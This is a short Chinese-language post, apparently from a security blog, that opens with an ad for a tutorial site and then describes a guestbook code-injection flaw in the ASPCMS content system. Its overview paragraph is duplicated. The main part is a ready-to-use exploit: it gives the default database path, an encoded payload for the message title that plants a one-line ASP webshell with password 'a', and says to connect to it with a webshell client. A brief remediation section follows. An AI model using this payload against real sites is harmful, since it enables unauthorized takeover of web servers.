流觞强烈向大家推荐一个好网站,【我要自学网】,教程由在校老师录制,有办公会计、平面设计、室内设计、机械设计、网页编程、影视动画等教程.....让你足不出门,都可以体验学校的专业教育!
aspcms主要是信息发布系统,影响版本为asp。漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库。数据库默认配置为asp.目录在/data/data.asp下。利用方法,保证默认数据库路径末更改及可留言,就算不能留言,可构造,经测试,基本上末更改
aspcms主要是信息发布系统,影响版本为asp。
漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库。
数据库默认配置为asp.目录在/data/data.asp下。
利用方法,保证默认数据库路径末更改及可留言,就算不能留言,可构造,经测试,九成的末更改:
在留言的标题处插入:
┼攠數畣整爠煥敵瑳∨≡┩愾
这样就往数据库中插入了一句话密码,密码为a,可以使用菜刀等软件进行连接
修复方法:
如果查看到自己网站已经被注入,请检测后台的留言记录中是否存在该异常留言,如果有,请及时在后台留言管理中删除,请勿直接编辑数据库原文件,会都在数据库文件无法识别丢失数据
1.修改数据默认路径;避免被注入后直接一句话木马连接 2.不需要留言板就删除留言板 3.修改数据库格式为mdb或者其他后缀 修改后修改数据库配置文件config/AspCms_Config.asp
